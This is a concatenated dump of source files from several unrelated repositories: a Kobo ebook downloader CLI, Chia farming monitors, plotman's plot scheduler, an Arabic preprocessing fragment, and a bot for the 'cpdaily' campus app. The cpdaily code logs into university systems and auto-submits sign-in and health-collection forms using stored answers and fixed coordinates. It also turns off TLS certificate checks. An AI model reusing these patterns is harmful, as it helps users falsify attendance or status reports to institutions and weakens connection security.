userlist = [Globals.Settings.UserList.getUser(user)]
books = actions.ListBooks(userlist, read, export_library)
headers = ['Title', 'Author', 'RevisionId', 'Owner']
data = sorted(
[
(book.Title + decorators(book), book.Author, book.RevisionId, book.Owner.Email,)
for book in books
]
)
click.echo(tabulate(data, headers, tablefmt=ctx['fmt']))
cli.add_command(book)
```
#### File: kobodl/commands/user.py
```python
import click
from tabulate import tabulate
from kobodl import actions, cli
from kobodl.globals import Globals
from kobodl.kobo import Kobo
from kobodl.settings import User
@click.group(name='user', short_help='show and create users')
def user():
pass
@user.command(name='list', help='list all users')
@click.pass_obj
def list(ctx):
userlist = Globals.Settings.UserList.users
headers = ['Email', 'UserKey', 'DeviceId']
data = sorted([(user.Email, user.UserKey, user.DeviceId,) for user in userlist])
click.echo(tabulate(data, headers, tablefmt=ctx['fmt']))
@user.command(name='rm', help='remove user by Email, UserKey, or DeviceID')
@click.argument('identifier', type=click.STRING)
@click.pass_obj
def rm(ctx, identifier):
removed = Globals.Settings.UserList.removeUser(identifier)
if removed:
Globals.Settings.Save()
click.echo(f'Removed {removed.Email}')
else:
click.echo(f'No user with email, key, or device id that matches "{identifier}"')
@user.command(name='add', help='add new user')
@click.option('--email', prompt=True, hide_input=False, type=click.STRING, help="kobo.com email.")
@click.password_option(help="kobo.com password (not stored)")
@click.pass_obj
def add(ctx, email, password):
user = User(Email=email)
click.echo(
"""
Open https://authorize.kobo.com/signin in a private/incognito window in your browser, wait till the page
loads (do not login!) then open the developer tools (use F12 in Firefox/Chrome), select the console tab,
and paste the following code there and then press Enter there in the browser.
var newCaptchaDiv = document.createElement( "div" );
newCaptchaDiv.id = "new-grecaptcha-container";
document.getElementById( "grecaptcha-container" ).insertAdjacentElement( "afterend", newCaptchaDiv );
grecaptcha.render( newCaptchaDiv.id, {
sitekey: "<KEY>",
callback: function( response ) { console.log( "Captcha response:" ); console.log( response ); }
} );
A captcha should show up below the Sign-in form. Once you solve the captcha its response will be written
below the pasted code in the browser's console. Copy the response (the line below "Captcha response:")
and paste it here.
"""
)
captcha = input('Captcha response: ').strip()
actions.Login(user, password, captcha)
Globals.Settings.UserList.users.append(user)
Globals.Settings.Save()
click.echo('Login Success. Try to list your books with `kobodl book list`')
cli.add_command(user)
``` |
{
"source": "7AC/chia-blockchain",
"score": 3
} |
#### File: 7AC/chia-blockchain/json_datasource.py
```python
from http.server import SimpleHTTPRequestHandler, HTTPServer
import json
import re
import subprocess
import time
hostName = "localhost"
serverPort = 8080
class FarmServer(SimpleHTTPRequestHandler):
statuses = {"Not available": 0,
"Not synced or not connected to peers": 1,
"Not running": 2,
"Syncing": 3,
"Farming": 4}
strings = frozenset(["Total size of plots",
"Estimated network space",
"Expected time to win",
"Note"])
    def do_GET(self):
        self.send_response(200)
        self.end_headers()
def do_POST(self):
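        # Answer what looks like Grafana SimpleJSON-style /search and /query requests by
        # shelling out to `chia farm summary` and `plotman status`.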
content_length = int(self.headers.get("Content-Length"))
body = self.rfile.read(content_length)
body_json = json.loads(body)
target = ""
try:
target = body_json["targets"]["target"]
except (TypeError, KeyError):
pass
stdout = subprocess.check_output(["chia", "farm", "summary"])
output = {}
for line in stdout.decode("utf-8").split("\n"):
try:
name, value = line.split(": ")
if not target or target == name:
output[name] = value
except ValueError:
continue
stdout = subprocess.check_output(["plotman", "status"])
tokens = re.split(" +", stdout.decode("utf-8"))
output["Plotting"] = len([token for token in tokens if token == "32"])
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
if self.path == '/search':
self.wfile.write(bytes(json.dumps(list(output.keys())), "utf-8"))
elif self.path == '/query':
columns = []
rows = []
for name, value in output.items():
column_type = "string" if name in self.strings else "number"
column_value = value
if name == "Farming status":
column_value = self.statuses[value]
columns.append({"text": name, "type": column_type})
rows.append(column_value)
table = [{"columns": columns,
"rows": [rows],
"type": "table"}]
self.wfile.write(bytes(json.dumps(table), "utf-8"))
if __name__ == "__main__":
webServer = HTTPServer((hostName, serverPort), FarmServer)
print("Server started http://%s:%s" % (hostName, serverPort))
try:
webServer.serve_forever()
except KeyboardInterrupt:
pass
webServer.server_close()
print("Server stopped.")
``` |
{
"source": "7AC/plotman",
"score": 2
} |
#### File: plotman/src/exporter.py
```python
import importlib
import importlib.resources
import time
from plotman import configuration
from plotman import resources as plotman_resources
from plotman.job import Job
from prometheus_client import start_http_server
from prometheus_client.core import GaugeMetricFamily, REGISTRY
class PlotmanCollector:
def collect(self):
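        # Load the plotman configuration, inspect the running plot jobs, and expose the
        # number of jobs in each phase as Prometheus gauges.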
config_path = configuration.get_path()
config_text = configuration.read_configuration_text(config_path)
preset_target_definitions_text = importlib.resources.read_text(
plotman_resources, "target_definitions.yaml",
)
cfg = configuration.get_validated_configs(config_text, config_path, preset_target_definitions_text)
running_jobs = Job.get_running_jobs(cfg.logging.plots)
phases = {1: 0,
2: 0,
3: 0,
4: 0}
for running_job in running_jobs:
phases[running_job.phase.major] += 1
for phase in phases.keys():
yield GaugeMetricFamily(f"plotman_jobs_count_phase_{phase}",
f"Number of plotting jobs in phase {phase}", value=phases[phase])
if __name__ == "__main__":
start_http_server(8001)
REGISTRY.register(PlotmanCollector())
while True:
time.sleep(1)
```
#### File: src/plotman/manager.py
```python
import logging
import operator
import os
import random
import re
import subprocess
import sys
import time
from datetime import datetime
import pendulum
import psutil
# Plotman libraries
from plotman import \
archive # for get_archdir_freebytes(). TODO: move to avoid import loop
from plotman import job, plot_util
# Constants
MIN = 60 # Seconds
HR = 3600 # Seconds
MAX_AGE = 1000_000_000 # Arbitrary large number of seconds
_WINDOWS = sys.platform == 'win32'
def dstdirs_to_furthest_phase(all_jobs):
'''Return a map from dst dir to a phase tuple for the most progressed job
that is emitting to that dst dir.'''
result = {}
for j in all_jobs:
if not j.dstdir in result.keys() or result[j.dstdir] < j.progress():
result[j.dstdir] = j.progress()
return result
def dstdirs_to_youngest_phase(all_jobs):
'''Return a map from dst dir to a phase tuple for the least progressed job
that is emitting to that dst dir.'''
result = {}
for j in all_jobs:
if j.dstdir is None:
continue
if not j.dstdir in result.keys() or result[j.dstdir] > j.progress():
result[j.dstdir] = j.progress()
return result
def phases_permit_new_job(phases, d, sched_cfg, dir_cfg):
'''Scheduling logic: return True if it's OK to start a new job on a tmp dir
with existing jobs in the provided phases.'''
# Filter unknown-phase jobs
phases = [ph for ph in phases if ph.known]
if len(phases) == 0:
return True
milestone = job.Phase(
major=sched_cfg.tmpdir_stagger_phase_major,
minor=sched_cfg.tmpdir_stagger_phase_minor,
)
# tmpdir_stagger_phase_limit default is 1, as declared in configuration.py
if len([p for p in phases if p < milestone]) >= sched_cfg.tmpdir_stagger_phase_limit:
return False
# Limit the total number of jobs per tmp dir. Default to the overall max
# jobs configuration, but restrict to any configured overrides.
max_plots = sched_cfg.tmpdir_max_jobs
if dir_cfg.tmp_overrides is not None and d in dir_cfg.tmp_overrides:
curr_overrides = dir_cfg.tmp_overrides[d]
if curr_overrides.tmpdir_max_jobs is not None:
max_plots = curr_overrides.tmpdir_max_jobs
if len(phases) >= max_plots:
return False
return True
def maybe_start_new_plot(dir_cfg, sched_cfg, plotting_cfg, log_cfg):
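    # Start a new plot job when the global stagger, global job limit and per-tmpdir limits
    # allow it: choose tmp and dst directories based on the phases of the running jobs,
    # assemble the `chia plots create` command line, and launch it with its own log file.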
jobs = job.Job.get_running_jobs(log_cfg.plots)
wait_reason = None # If we don't start a job this iteration, this says why.
youngest_job_age = min(jobs, key=job.Job.get_time_wall).get_time_wall() if jobs else MAX_AGE
global_stagger = int(sched_cfg.global_stagger_m * MIN)
if (youngest_job_age < global_stagger):
wait_reason = 'stagger (%ds/%ds)' % (youngest_job_age, global_stagger)
elif len(jobs) >= sched_cfg.global_max_jobs:
wait_reason = 'max jobs (%d) - (%ds/%ds)' % (sched_cfg.global_max_jobs, youngest_job_age, global_stagger)
else:
tmp_to_all_phases = [(d, job.job_phases_for_tmpdir(d, jobs)) for d in dir_cfg.tmp]
eligible = [ (d, phases) for (d, phases) in tmp_to_all_phases
if phases_permit_new_job(phases, d, sched_cfg, dir_cfg) ]
rankable = [ (d, phases[0]) if phases else (d, job.Phase(known=False))
for (d, phases) in eligible ]
if not eligible:
wait_reason = 'no eligible tempdirs (%ds/%ds)' % (youngest_job_age, global_stagger)
else:
# Plot to oldest tmpdir.
tmpdir = max(rankable, key=operator.itemgetter(1))[0]
if dir_cfg.dst_is_tmp2():
dstdir = dir_cfg.tmp2
elif dir_cfg.dst_is_tmp():
dstdir = tmpdir
else:
# Select the dst dir least recently selected
dst_dirs = dir_cfg.get_dst_directories()
dir2ph = { d:ph for (d, ph) in dstdirs_to_youngest_phase(jobs).items()
if d in dst_dirs and ph is not None}
unused_dirs = [d for d in dst_dirs if d not in dir2ph.keys()]
dstdir = ''
if unused_dirs:
dstdir = random.choice(unused_dirs)
else:
dstdir = max(dir2ph, key=dir2ph.get)
log_file_path = log_cfg.create_plot_log_path(time=pendulum.now())
plot_args = ['chia', 'plots', 'create',
'-k', str(plotting_cfg.k),
'-r', str(plotting_cfg.n_threads),
'-u', str(plotting_cfg.n_buckets),
'-b', str(plotting_cfg.job_buffer),
'-t', tmpdir,
'-d', dstdir ]
if plotting_cfg.e:
plot_args.append('-e')
if plotting_cfg.farmer_pk is not None:
plot_args.append('-f')
plot_args.append(plotting_cfg.farmer_pk)
if plotting_cfg.pool_pk is not None:
plot_args.append('-p')
plot_args.append(plotting_cfg.pool_pk)
if plotting_cfg.pool_contract_address is not None:
plot_args.append('-c')
plot_args.append(plotting_cfg.pool_contract_address)
if dir_cfg.tmp2 is not None:
plot_args.append('-2')
plot_args.append(dir_cfg.tmp2)
if plotting_cfg.x:
plot_args.append('-x')
logmsg = ('Starting plot job: %s ; logging to %s' % (' '.join(plot_args), log_file_path))
# TODO: CAMPid 09840103109429840981397487498131
try:
open_log_file = open(log_file_path, 'x')
except FileExistsError:
# The desired log file name already exists. Most likely another
# plotman process already launched a new process in response to
# the same scenario that triggered us. Let's at least not
# confuse things further by having two plotting processes
# logging to the same file. If we really should launch another
# plotting process, we'll get it at the next check cycle anyways.
message = (
f'Plot log file already exists, skipping attempt to start a'
f' new plot: {log_file_path!r}'
)
                return (False, message)
except FileNotFoundError as e:
message = (
f'Unable to open log file. Verify that the directory exists'
f' and has proper write permissions: {log_file_path!r}'
)
raise Exception(message) from e
# Preferably, do not add any code between the try block above
# and the with block below. IOW, this space intentionally left
# blank... As is, this provides a good chance that our handle
# of the log file will get closed explicitly while still
# allowing handling of just the log file opening error.
with open_log_file:
# start_new_sessions to make the job independent of this controlling tty (POSIX only).
# subprocess.CREATE_NO_WINDOW to make the process independent of this controlling tty and have no console window on Windows.
p = subprocess.Popen(plot_args,
stdout=open_log_file,
stderr=subprocess.STDOUT,
start_new_session=True,
creationflags=0 if not _WINDOWS else subprocess.CREATE_NO_WINDOW)
psutil.Process(p.pid).nice(15 if not _WINDOWS else psutil.BELOW_NORMAL_PRIORITY_CLASS)
return (True, logmsg)
return (False, wait_reason)
def select_jobs_by_partial_id(jobs, partial_id):
selected = []
for j in jobs:
if j.plot_id.startswith(partial_id):
selected.append(j)
return selected
``` |
{
"source": "7aGiven/cpdaily",
"score": 3
} |
#### File: python/actions/casLogin.py
```python
import re
import requests
import urllib.parse
from bs4 import BeautifulSoup
from urllib3.exceptions import InsecureRequestWarning
from actions.utils import Utils
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class casLogin:
    # Initialize the CAS login module
def __init__(self, username, password, login_url, host, session):
self.username = username
self.password = password
self.login_url = login_url
self.host = host
self.session = session
self.type = 0
self.headers = {
'User-Agent':
'Mozilla/5.0 (Linux; Android 8.0.0; MI 6 Build/OPR1.170623.027; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/92.0.4515.131 Mobile Safari/537.36 okhttp/3.12.4',
'Content-Type': 'application/x-www-form-urlencoded'
}
    # Check whether a captcha is required
def getNeedCaptchaUrl(self):
if self.type == 0:
url = self.host + 'authserver/needCaptcha.html' + '?username=' + self.username
flag = self.session.get(url, verify=False).text
return 'false' != flag[:5] and 'False' != flag[:5]
else:
url = self.host + 'authserver/checkNeedCaptcha.htl' + '?username=' + self.username
flag = self.session.get(url, verify=False).json()
return flag['isNeed']
def login(self):
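        # Fetch the login page, detect which CAS form variant it uses, copy its hidden
        # fields, encrypt the password (AES with a salt, or RSA for the lyuapServer form),
        # solve a captcha if one is required, and POST the form.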
html = self.session.get(self.login_url, verify=False).text
soup = BeautifulSoup(html, 'lxml')
if len(soup.select('#casLoginForm')) > 0:
self.type = 0
elif len(soup.select('#loginFromId')) > 0:
soup = BeautifulSoup(str(soup.select('#loginFromId')[1]), 'lxml')
self.type = 1
elif len(soup.select('#fm1')) > 0:
soup = BeautifulSoup(str(soup.select('#fm1')[0]), 'lxml')
self.type = 2
else:
raise Exception('出错啦!网页中没有找到LoginForm')
        # Fill in the form data
params = {}
form = soup.select('input')
for item in form:
if None != item.get('name') and len(item.get('name')) > 0:
if item.get('name') != 'rememberMe':
if None == item.get('value'):
params[item.get('name')] = ''
else:
params[item.get('name')] = item.get('value')
params['username'] = self.username
        # Get the encryption key
if self.type == 2:
pattern = 'RSAKeyPair\((.*?)\);'
publicKey = re.findall(pattern, html)
publicKey = publicKey[0].replace('"', "").split(',')
params['password'] = Utils.encryptRSA(self.password, publicKey[2],
publicKey[0])
params['captcha'] = Utils.getCodeFromImg(
self.session, self.host + 'lyuapServer/captcha.jsp')
else:
if self.type == 0:
salt = soup.select("#pwdDefaultEncryptSalt")
else:
salt = soup.select("#pwdEncryptSalt")
if len(salt) != 0:
salt = salt[0].get('value')
else:
pattern = '\"(\w{16})\"'
salt = re.findall(pattern, html)
if len(salt) == 1:
salt = salt[0]
else:
salt = False
if not salt:
params['password'] = self.password
else:
params['password'] = Utils.encryptAES(
Utils.randString(64) + self.password, salt)
if self.getNeedCaptchaUrl():
if self.type == 0:
imgUrl = self.host + 'authserver/captcha.html'
params['captchaResponse'] = Utils.getCodeFromImg(
self.session, imgUrl)
else:
imgUrl = self.host + 'authserver/getCaptcha.htl'
params['captcha'] = Utils.getCodeFromImg(
self.session, imgUrl)
data = self.session.post(self.login_url,
data=urllib.parse.urlencode(params),
headers=self.headers,
allow_redirects=False)
        # A 302 redirect means the login succeeded
if data.status_code == 302:
jump_url = data.headers['Location']
res = self.session.post(jump_url, verify=False)
if res.url.find('campusphere.net/') == -1:
raise Exception('CAS登陆失败,未能成功跳转今日校园!')
return self.session.cookies
elif data.status_code == 200 or data.status_code == 401:
data = data.text
soup = BeautifulSoup(data, 'lxml')
if len(soup.select('#errorMsg')) > 0:
msg = soup.select('#errorMsg')[0].get_text()
elif len(soup.select('#formErrorTip2')) > 0:
msg = soup.select('#formErrorTip2')[0].get_text()
elif len(soup.select('#msg')) > 0:
msg = soup.select('#msg')[0].get_text()
else:
msg = 'CAS登陆失败,意料之外的错误!'
raise Exception(msg)
else:
raise Exception('CAS登陆失败!返回状态码:' + str(data.status_code))
```
#### File: python/actions/collection.py
```python
import json
from actions.utils import Utils
from actions.wiseLoginService import wiseLoginService
class Collection:
# 初始化信息收集类
def __init__(self, wiseLoginService: wiseLoginService, userInfo):
self.session = wiseLoginService.session
self.host = wiseLoginService.campus_host
self.userInfo = userInfo
self.form = None
self.collectWid = None
self.formWid = None
self.schoolTaskWid = None
self.instanceWid = None
self.apis = Utils.getApis(userInfo['type'])
    # Query the form
def queryForm(self):
headers = self.session.headers
headers['Content-Type'] = 'application/json'
queryUrl = self.host + self.apis[0]
params = {"pageSize": 20, "pageNumber": 1}
res = self.session.post(queryUrl,
data=json.dumps(params),
headers=headers,
verify=False).json()
if len(res['datas']['rows']) < 1:
raise Exception('当前暂时没有未完成的信息收集哦!')
for item in res['datas']['rows']:
if item['isHandled'] == 0:
self.collectWid = item['wid']
self.formWid = item['formWid']
self.instanceWid = item['instanceWid']
if (self.formWid == None):
raise Exception('当前暂时没有未完成的信息收集哦!')
detailUrl = self.host + self.apis[1]
res = self.session.post(detailUrl,
headers=headers,
data=json.dumps({
"collectorWid": self.collectWid,
"instanceWid": self.instanceWid
}),
verify=False).json()
self.schoolTaskWid = res['datas']['collector']['schoolTaskWid']
getFormUrl = self.host + self.apis[2]
params = {
"pageSize": 100,
"pageNumber": 1,
"formWid": self.formWid,
"collectorWid": self.collectWid,
"instanceWid": self.instanceWid
}
res = self.session.post(getFormUrl,
headers=headers,
data=json.dumps(params),
verify=False).json()
self.form = res['datas']['rows']
    # Fill in the form
def fillForm(self):
index = 0
onlyRequired = self.userInfo[
'onlyRequired'] if 'onlyRequired' in self.userInfo else 1
for formItem in self.form[:]:
if onlyRequired == 1:
if not formItem['isRequired']:
                    # Remove items that are not required
self.form.remove(formItem)
continue
try:
userForm = self.userInfo['forms'][index]['form']
except:
raise Exception('请检查forms配置是否正确!')
            # Check whether the user wants titles validated
            if self.userInfo['checkTitle'] == 1:
                # The titles do not match
if formItem['title'] != userForm['title']:
raise Exception(
f'\r\n第{index + 1}个配置项的标题不正确\r\n您的标题为:[{userForm["title"]}]\r\n系统的标题为:[{formItem["title"]}]'
)
            # Skip questions the user chose to ignore
            if 'ignore' in userForm and userForm['ignore']:
                formItem['value'] = None
                # Set show to False
                formItem['show'] = False
                # Clear all of the options
if 'fieldItems' in formItem:
formItem['fieldItems'].clear()
index += 1
continue
            # Text fields: assign the value directly
            if formItem['fieldType'] in ['1', '5', '6', '7']:
                formItem['value'] = userForm['value']
            # Fill radio (single-choice) fields
            elif formItem['fieldType'] == '2':
                # Single choice: remove the extra (unselected) options
fieldItems = formItem['fieldItems']
for fieldItem in fieldItems[:]:
if fieldItem['content'] == userForm['value']:
formItem['value'] = fieldItem['itemWid']
if fieldItem['isOtherItems'] and fieldItem[
'otherItemType'] == '1':
if 'extra' not in userForm:
raise Exception(
f'\r\n第{index + 1}个配置项的选项不正确,该选项需要extra字段')
fieldItem['contentExtend'] = userForm['extra']
else:
fieldItems.remove(fieldItem)
if len(fieldItems) != 1:
raise Exception(f'\r\n第{index + 1}个配置项的选项不正确,该选项为必填单选')
            # Fill checkbox (multi-choice) fields
elif formItem['fieldType'] == '3':
fieldItems = formItem['fieldItems']
userItems = userForm['value'].split('|')
tempValue = []
for fieldItem in fieldItems[:]:
if fieldItem['content'] in userItems:
tempValue.append(fieldItem['itemWid'])
if fieldItem['isOtherItems'] and fieldItem[
'otherItemType'] == '1':
if 'extra' not in userForm:
raise Exception(
f'\r\n第{index + 1}个配置项的选项不正确,该选项需要extra字段')
fieldItem['contentExtend'] = userForm['extra']
else:
fieldItems.remove(fieldItem)
if len(fieldItems) == 0:
raise Exception(f'\r\n第{index + 1}个配置项的选项不正确,该选项为必填多选')
formItem['value'] = ','.join(tempValue)
elif formItem['fieldType'] == '4':
Utils.uploadPicture(self, self.apis[4], userForm['value'])
formItem['value'] = Utils.getPictureUrl(self, self.apis[5])
else:
raise Exception(f'\r\n第{index + 1}个配置项的类型未适配')
index += 1
    # Submit the form
def submitForm(self):
self.submitData = {
"formWid": self.formWid,
"address": self.userInfo['address'],
"collectWid": self.collectWid,
"instanceWid": self.instanceWid,
"schoolTaskWid": self.schoolTaskWid,
"form": self.form,
"uaIsCpadaily": True,
"latitude": self.userInfo['lat'],
'longitude': self.userInfo['lon']
}
self.submitApi = self.apis[3]
res = Utils.submitFormData(self).json()
return res['message']
```
#### File: python/actions/wiseLoginService.py
```python
import re
import requests
from urllib3.exceptions import InsecureRequestWarning
from actions.casLogin import casLogin
from actions.iapLogin import iapLogin
from actions.utils import Utils
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class wiseLoginService:
    # Initialize the local login class
def __init__(self, userInfo, httpProxy):
if None == userInfo['username'] or '' == userInfo[
'username'] or None == userInfo['password'] or '' == userInfo[
'password'] or None == userInfo[
'schoolName'] or '' == userInfo['schoolName']:
raise Exception('初始化类失败,请键入完整的参数(用户名,密码,学校名称)')
self.username = userInfo['username']
self.password = userInfo['password']
self.schoolName = userInfo['schoolName']
self.session = requests.session()
headers = {
'User-Agent':
'Mozilla/5.0 (Linux; Android 8.0.0; MI 6 Build/OPR1.170623.027; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/92.0.4515.131 Mobile Safari/537.36 okhttp/3.12.4',
}
self.session.headers = headers
self.session.hooks['response'].append(Utils.checkStatus)
self.session.adapters.DEFAULT_RETRIES = 5
if httpProxy != '':
Utils.log('全局代理已启用')
self.session.proxies = {'http': httpProxy, 'https': httpProxy}
self.login_url = ''
self.campus_host = ''
self.login_host = ''
self.loginEntity = None
self.login_type = ''
    # Look up the school's login URL by school name via the API
def getLoginUrlBySchoolName(self):
schools = self.session.get(
'https://mobile.campushoy.com/v6/config/guest/tenant/list',
verify=False).json()['data']
flag = False
for item in schools:
if item['name'] == self.schoolName:
flag = True
if item['joinType'] == 'NONE':
raise Exception(self.schoolName + '未加入今日校园,请检查...')
params = {'ids': item['id']}
data = self.session.get(
'https://mobile.campushoy.com/v6/config/guest/tenant/info',
params=params,
verify=False,
).json()['data'][0]
joinType = data['joinType']
ampUrl = data['ampUrl']
ampUrl2 = data['ampUrl2']
if 'campusphere' in ampUrl:
clientUrl = ampUrl
elif 'campusphere' in ampUrl2:
clientUrl = ampUrl2
else:
raise Exception('未找到客户端登录地址')
res = self.session.get(clientUrl, verify=False)
self.campus_host = re.findall('\w{4,5}\:\/\/.*?\/',
clientUrl)[0]
self.login_url = res.url
self.login_host = re.findall('\w{4,5}\:\/\/.*?\/', res.url)[0]
self.login_type = joinType
break
if flag == False:
raise Exception(self.schoolName + '不存在或未加入今日校园')
    # Decide which login method to use (IAP for CLOUD tenants, otherwise CAS)
def checkLogin(self):
if self.login_type == 'CLOUD':
self.loginEntity = iapLogin(self.username, self.password,
self.login_url, self.login_host,
self.session)
self.session.cookies = self.loginEntity.login()
else:
self.loginEntity = casLogin(self.username, self.password,
self.login_url, self.login_host,
self.session)
self.session.cookies = self.loginEntity.login()
    # Perform the login
    def login(self):
        # Get the school's login address
self.getLoginUrlBySchoolName()
self.checkLogin()
```
#### File: main/python/index.py
```python
from tencentcloud.common.profile.http_profile import HttpProfile
from actions.wiseLoginService import wiseLoginService
from actions.autoSign import AutoSign
from actions.collection import Collection
from actions.workLog import workLog
from actions.pushKit import pushKit
from actions.utils import Utils
from time import sleep
def main():
Utils.log("自动化任务开始执行")
config = Utils.getYmlConfig()
push = pushKit(config['notifyOption'])
httpProxy = config['httpProxy'] if 'httpProxy' in config else ''
for user in config['users']:
Utils.log(
f"10s后开始执行用户{user['user']['username'] if user['user']['username'] else '默认用户'}的任务"
)
sleep(10)
        if config['debug']:
            msg = working(user, httpProxy)
            ret = True
else:
try:
msg = working(user, httpProxy)
ret = True
except Exception as e:
msg = str(e)
ret = False
ntm = Utils.getTimeStr()
if ret == True:
            # Note: even if this reports success, the task may not have really succeeded; check the app to be sure
Utils.log(msg)
if 'SUCCESS' in msg:
msg = push.sendMsg(
'今日校园签到成功通知',
'服务器(V%s)于%s尝试签到成功!' % (config['Version'], ntm),
user['user'])
else:
msg = push.sendMsg(
'今日校园签到异常通知', '服务器(V%s)于%s尝试签到异常!\n异常信息:%s' %
(config['Version'], ntm, msg), user['user'])
else:
Utils.log("Error:" + msg)
msg = push.sendMsg(
'今日校园签到失败通知', '服务器(V%s)于%s尝试签到失败!\n错误信息:%s' %
(config['Version'], ntm, msg), user['user'])
Utils.log(msg)
Utils.log("自动化任务执行完毕")
def working(user, httpProxy):
Utils.log('正在获取登录地址')
wise = wiseLoginService(user['user'], httpProxy)
Utils.log('开始尝试登录账号')
wise.login()
sleep(1)
    # Login succeeded; use `type` to decide between information collection, sign-in, and dorm check
    # Information collection
    if user['user']['type'] == 0:
        # The following code handles information collection
Utils.log('开始执行收集任务')
collection = Collection(wise, user['user'])
collection.queryForm()
collection.fillForm()
sleep(1)
msg = collection.submitForm()
return msg
elif user['user']['type'] in [1,2,3]:
        # The following code handles sign-in
Utils.log('开始执行签到任务')
sign = AutoSign(wise, user['user'])
sign.getUnSignTask()
sleep(1)
sign.getDetailTask()
sign.fillForm()
sleep(1)
msg = sign.submitForm()
return msg
elif user['user']['type'] == 4:
        # The following code handles work logs
Utils.log('开始执行日志任务')
work = workLog(wise, user['user'])
work.checkHasLog()
sleep(1)
work.getFormsByWids()
work.fillForms()
sleep(1)
msg = work.submitForms()
return msg
# Entry point for Aliyun (Alibaba Cloud)
def handler(event, context):
main()
# Entry point for Tencent Cloud
def main_handler(event, context):
main()
return 'Finished'
if __name__ == '__main__':
main()
``` |
{
"source": "7agustibm/kata.tamagotchi",
"score": 2
} |
#### File: features/steps/ChangingTamagotchiNeedsOverTime.py
```python
from behave import *
from nose.tools import eq_
use_step_matcher("re")
@when("time passes")
def step_impl(context):
context.tamagotchi.timePasses()
@step("it's hungriness is increased")
def step_impl(context):
eq_(6, context.tamagotchi.hungriness)
@step("it's happiness is decreased")
def step_impl(context):
eq_(4, context.tamagotchi.happiness)
```
#### File: features/steps/FeedingTamagotchi.py
```python
from behave import *
from nose.tools import eq_
from tamagochi.tamagochi import Tamagotchi
use_step_matcher("re")
@given("I have a Tamagotchi")
def step_impl(context):
context.tamagotchi = Tamagotchi()
@when("I feed it")
def step_impl(context):
context.tamagotchi.eat()
@then("it's hungriness is decreased")
def step_impl(context):
eq_(4, context.tamagotchi.hungriness)
@step("it's fullness is increased")
def step_impl(context):
eq_(6, context.tamagotchi.fullness)
```
#### File: features/steps/PlayingWithTamagotchi.py
```python
from behave import *
from nose.tools import eq_
use_step_matcher("re")
@when("I play with it")
def step_impl(context):
context.tamagotchi.play()
@then("it's happiness is increased")
def step_impl(context):
eq_(6, context.tamagotchi.happiness)
@step("it's tiredness is increased")
def step_impl(context):
eq_(6, context.tamagotchi.tiredness)
```
#### File: features/steps/PuttingTamagotchiToBed.py
```python
from behave import *
use_step_matcher("re")
@when("I put it to bed")
def step_impl(context):
context.tamagotchi.toBed()
@then("it's tiredness is decreased")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
pass
``` |
{
"source": "7albertoh/insight_project",
"score": 3
} |
#### File: insight_project/scripts/clean_genre_25_pages.py
```python
import time
from pathlib import Path
import os
from bs4 import BeautifulSoup as bs
def extract_from_html():
data_path = str(Path(os.getcwd()).parents[0])+'/data/html_files/'
out_csv = []
for i in range(0,25):
soup = bs(open(data_path+str(i+1)+'.html',encoding="utf-8"),'html.parser')
titles = soup.find_all('a', class_='bookTitle')
authors = soup.find_all('a', class_='authorName')
gray_text = soup.find_all('span',class_='greyText smallText')
if not len(titles) == len(authors) == len(gray_text):
print('issue')
for i in range(0,len(titles)):
booktitlei = str(titles[i].string.encode("utf-8")).replace(",",";")[2:-1] # book title
bookrefi = str(titles[i]['href'].encode("utf-8")).replace(",",";")[2:-1]
authornamei = str(authors[i].string.encode("utf-8")).replace(",",";")[2:-1]
ratings_yeari = str(gray_text[i].string).replace('\n','').replace(",","").split()
avg_ratingi = ratings_yeari[2]
num_ratingsi = ratings_yeari[4]
yeari = ratings_yeari[8] if len(ratings_yeari) == 9 else ""
out_csv.append(booktitlei + "," + bookrefi + "," + authornamei + "," + avg_ratingi + "," +num_ratingsi + "," + yeari)
with open(str(Path(os.getcwd()).parents[0])+"/data/genre_25_pages.csv",'w') as f1:
f1.write('book_title, book_reference, author_names, avg_rating, num_ratings, year_published \n')
[f1.write(i+"\n") for i in out_csv]
def main():
extract_from_html()
if __name__ == "__main__":
main()
``` |
{
"source": "7alexvega/gradient",
"score": 3
} |
#### File: 7alexvega/gradient/gradient.py
```python
import atexit
import json
import os
import time
from config import config
from hue import Hue
from image import Image
from spotify import Spotify
from windows import Windows
class Gradient:
def __init__(self):
self.cache = self.get_cache()
def get_cache(self):
if os.path.exists('db.json'):
with open('db.json', 'r') as file:
cache = json.load(file)
else:
cache = dict()
return cache
def start(self):
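        # Main loop: watch the song currently playing, build (and cache) a wallpaper from
        # its album art, set it as the Windows wallpaper, and push the dominant colors to
        # the configured Hue lights.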
spotify = Spotify()
windows = Windows()
image = Image()
hue = Hue()
atexit.register(windows.revert_wallpaper)
atexit.register(lambda: json.dump(self.cache, open('db.json', 'w')))
previous_song = None
while True:
current_song = windows.get_current_song()
if current_song:
song_changed = current_song != previous_song
if song_changed:
previous_song = current_song
album_art_url = spotify.get_current_album_art_url()
album_key = album_art_url.rsplit('/')[-1]
if album_key in self.cache and os.path.exists(self.cache[album_key]):
wallpaper_path = self.cache[album_key]
else:
album_art = spotify.get_album_art_image(album_art_url)
wallpaper_path = image.create_wallpaper(album_art, album_key)
self.cache[album_key] = wallpaper_path
hue_lights = config['hue']['lights']
dominant_colors = image.get_dominant_colors(wallpaper_path, len(hue_lights))
for i in range(len(dominant_colors)):
light = hue_lights[i]
color = dominant_colors[i]
hue.update_light_color(light, color)
windows.set_wallpaper(wallpaper_path)
else:
windows.revert_wallpaper()
time.sleep(config['gradient']['refresh_delay_s'])
if __name__ == '__main__':
gradient = Gradient()
gradient.start()
``` |
{
"source": "7AM7/Arabic-dialects-segmenter-with-flask",
"score": 3
} |
#### File: API/model/preprocessing.py
```python
__author__ = '<NAME> (<EMAIL>)'
import re
import datetime
from nltk.tokenize import word_tokenize
import nltk
try:
nltk.data.find('tokenizers/punkt')
except LookupError:
nltk.download('punkt')
def valid_date(datestring):
try:
mat=re.match('^(\d{2})[/.-](\d{2})[/.-](\d{4})$', datestring)
if mat is not None:
datetime.datetime(*(map(int, mat.groups()[-1::-1])))
return True
except ValueError:
pass
return False
def valid_number(numstring):
try:
mat=re.match("^[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?$", numstring)
if mat is not None:
return True
except ValueError:
pass
